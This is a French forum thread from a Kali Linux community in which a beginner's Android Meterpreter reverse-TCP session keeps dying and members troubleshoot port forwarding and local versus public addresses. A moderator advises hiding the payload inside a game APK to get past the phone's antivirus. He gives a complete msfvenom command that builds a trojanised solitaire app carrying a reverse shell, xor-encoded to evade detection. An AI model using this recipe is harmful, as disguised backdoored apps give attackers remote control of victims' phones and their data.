Auteur Sujet: [Résolu] Metasploit : Le playload ne s'éxecute pas ainsi que meterpreter  (Lu 8506 fois)

0 Membres et 1 Invité sur ce sujet

Hors ligne Camillerakoto
  • Membre Junior
  • *
  • Messages: 23
  • +0/-0
Re : Metasploit : Le playload ne s'éxecute pas ainsi que meterpreter
« Réponse #15 le: 03 juin 2019 à 15:28:09 »
J'ai créé cela :
External port Start : 4444
External port END : 4444
Protocol : TCP
Internal Port Start : 4444
Internal Port End : 4444
Server IP Address : 192.168.1.5
WAN Interface    : ppp0.1
Est-ce que c'est bon ?
Que dois-je faire maintenant ?

En ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 3078
  • +174/-5
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : Metasploit : Le playload ne s'éxecute pas ainsi que meterpreter
« Réponse #16 le: 03 juin 2019 à 15:29:22 »
ça m'a l'air bon , maintenant réessaye tout simplement ta manip'
Mess  with the bests.
Die like the rest.

Hors ligne Camillerakoto
  • Membre Junior
  • *
  • Messages: 23
  • +0/-0
Re : Metasploit : Le playload ne s'éxecute pas ainsi que meterpreter
« Réponse #17 le: 03 juin 2019 à 17:25:55 »
À chaque fois il met : Meterpreter session 1 closed. Reason : Died

En ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 3078
  • +174/-5
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : Metasploit : Le playload ne s'éxecute pas ainsi que meterpreter
« Réponse #18 le: 03 juin 2019 à 17:36:00 »
Si tu ne fais pas un effort pour nous communiquer les infos ça va être dur :/
Ta kali est à jour ? c'est quoi le modèle et la version android de ton telephone ?
Mess  with the bests.
Die like the rest.

Hors ligne Snk

  • Modérateur
  • Membre Elite
  • *****
  • Messages: 1658
  • +112/-1
  • Multiboot Linux - Kali en Amateur - python(A)
Re : Metasploit : Le playload ne s'éxecute pas ainsi que meterpreter
« Réponse #19 le: 03 juin 2019 à 17:42:04 »
A mon avis ton tel ne veux pas se faire pirater... Ou l'AV? Est t'il désactivé?
On voit que la connexion se fait, puis est coupé, le tel s'en rend compte et termine la connexion... Il se rend compte que quelquechose n'est pas normal.
Tu devrait peux étre prendre un apk genre un jeux et cacher/crypter ton exploit/payload dedans.

Reason : Died  => veux bien dire qu'il trouve ça louche et coupe...
Et fais d'abord le truc en local, aprés tu verra si ça fonctionne pour le port-forwarding
« Modifié: 03 juin 2019 à 17:48:13 par Snk »
A l'époque c'était système_D (Comme démerdes-toi!)
On ne gagne pas sa Liberté , On choisi de la prendre!
Membre du P.L.F, Bill Gate$ suck'$.
Anti GAFAM - Brûlons les tous!
Eux, c'est les pommes, et vous les poires...

Hors ligne Camillerakoto
  • Membre Junior
  • *
  • Messages: 23
  • +0/-0
Re : Metasploit : Le playload ne s'éxecute pas ainsi que meterpreter
« Réponse #20 le: 03 juin 2019 à 17:42:52 »
Oui j'ai la dernière version de Kali. Mon téléphone est un TECNO-NX avec un Android 8.1.0

En ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 3078
  • +174/-5
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : Metasploit : Le playload ne s'éxecute pas ainsi que meterpreter
« Réponse #21 le: 03 juin 2019 à 17:45:03 »
comme l'a suggéré Snk surement ton téléphone qui est la raiosn de cette coupure , je ne vois que ça ou un problème de configuration
Mess  with the bests.
Die like the rest.

Hors ligne Camillerakoto
  • Membre Junior
  • *
  • Messages: 23
  • +0/-0
Re : Metasploit : Le playload ne s'éxecute pas ainsi que meterpreter
« Réponse #22 le: 03 juin 2019 à 17:49:39 »
Qu'c'est ce que l'AV?  Et comment prendre un apk et cacher mon exploit dedans ?
Merci à vous deux pour vos réponses :)

Hors ligne _john_doe
  • Contributeur de Kali-linux.fr
  • Membre VIP
  • *****
  • Messages: 608
  • +37/-5
J'ai créé cela :
External port Start : 4444
External port END : 4444
Protocol : TCP
Internal Port Start : 4444
Internal Port End : 4444
Server IP Address : 192.168.1.5
WAN Interface    : ppp0.1
Est-ce que c'est bon ?
Que dois-je faire maintenant ?

Le port forwarding n'est utile via la box que si tu compte tester ton payload en wan.
Quel IP es tu mis dans ton payload ?
Une IP publique ? (donc reverse tcp en Wan)
Ou une IP locale (donc reverse tcp en Lan)
Pour éliminer les causes probables d'erreur fais d'abord ton test en local

Donc pour résumé quel test fais tu ?
Ton telephone est-il branché sur le meme reseau wifi que ton kali ? (plage d'adres 192.x.x.x)  -> test en Lan
Ou essaie tu directement de connecter ton payload en reverse tcp en ayant fourni une IP publique lors de la creation du payload et en ayant activé ton port forwarding sur ta box ?  -> test en WAN



En ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 3078
  • +174/-5
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : Metasploit : Le playload ne s'éxecute pas ainsi que meterpreter
« Réponse #24 le: 03 juin 2019 à 17:52:37 »
J'ai déjà poser ces questions ^^' j'attends toujours une réponse claire ^^'
Mess  with the bests.
Die like the rest.

Hors ligne Snk

  • Modérateur
  • Membre Elite
  • *****
  • Messages: 1658
  • +112/-1
  • Multiboot Linux - Kali en Amateur - python(A)
Re : Metasploit : Le playload ne s'éxecute pas ainsi que meterpreter
« Réponse #25 le: 03 juin 2019 à 17:55:02 »
Le plus simple, reste de d'abord le faire en local, a mon avis...
Tu télécharges un jeux par exemple solitaire.apk, avec bf_xor qu'il faut installer avant, (mais tu peux en prendre un qui est déjà dans metasploit, genre: x86/shikata_ga_nai) tu peux faire un truc comme ça (de tête car pas le temps de tester maintenant):

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.x.x LPORT="celui_qui_est_dans_l'exploit" --platform android -f raw -x solitaire.apk -k -f apk -e x86/bf_xor -i 4 -o new_solitaire.apk
« Modifié: 03 juin 2019 à 19:52:54 par Snk »
A l'époque c'était système_D (Comme démerdes-toi!)
On ne gagne pas sa Liberté , On choisi de la prendre!
Membre du P.L.F, Bill Gate$ suck'$.
Anti GAFAM - Brûlons les tous!
Eux, c'est les pommes, et vous les poires...

Hors ligne Camillerakoto
  • Membre Junior
  • *
  • Messages: 23
  • +0/-0
Re : Metasploit : Le playload ne s'éxecute pas ainsi que meterpreter
« Réponse #26 le: 03 juin 2019 à 17:57:39 »
J'utilise mon adresse ipv4.
Oui, je suis branché sur le même réseau WiFi que mon Kali.

En ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 3078
  • +174/-5
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : Metasploit : Le playload ne s'éxecute pas ainsi que meterpreter
« Réponse #27 le: 03 juin 2019 à 17:58:42 »
ton adresse Ipv4 Locale ou publique....... ?
@Snk oui en local pour tester toujours :P
Mess  with the bests.
Die like the rest.

Hors ligne Camillerakoto
  • Membre Junior
  • *
  • Messages: 23
  • +0/-0
Re : Metasploit : Le playload ne s'éxecute pas ainsi que meterpreter
« Réponse #28 le: 03 juin 2019 à 18:00:03 »
J'ai tapé Ifconfig et j'ai pris mon adresse IP (je pense locale).

Hors ligne Snk

  • Modérateur
  • Membre Elite
  • *****
  • Messages: 1658
  • +112/-1
  • Multiboot Linux - Kali en Amateur - python(A)
Re : Metasploit : Le playload ne s'éxecute pas ainsi que meterpreter
« Réponse #29 le: 03 juin 2019 à 18:01:00 »
192.168.x.x  => LOCAL
A l'époque c'était système_D (Comme démerdes-toi!)
On ne gagne pas sa Liberté , On choisi de la prendre!
Membre du P.L.F, Bill Gate$ suck'$.
Anti GAFAM - Brûlons les tous!
Eux, c'est les pommes, et vous les poires...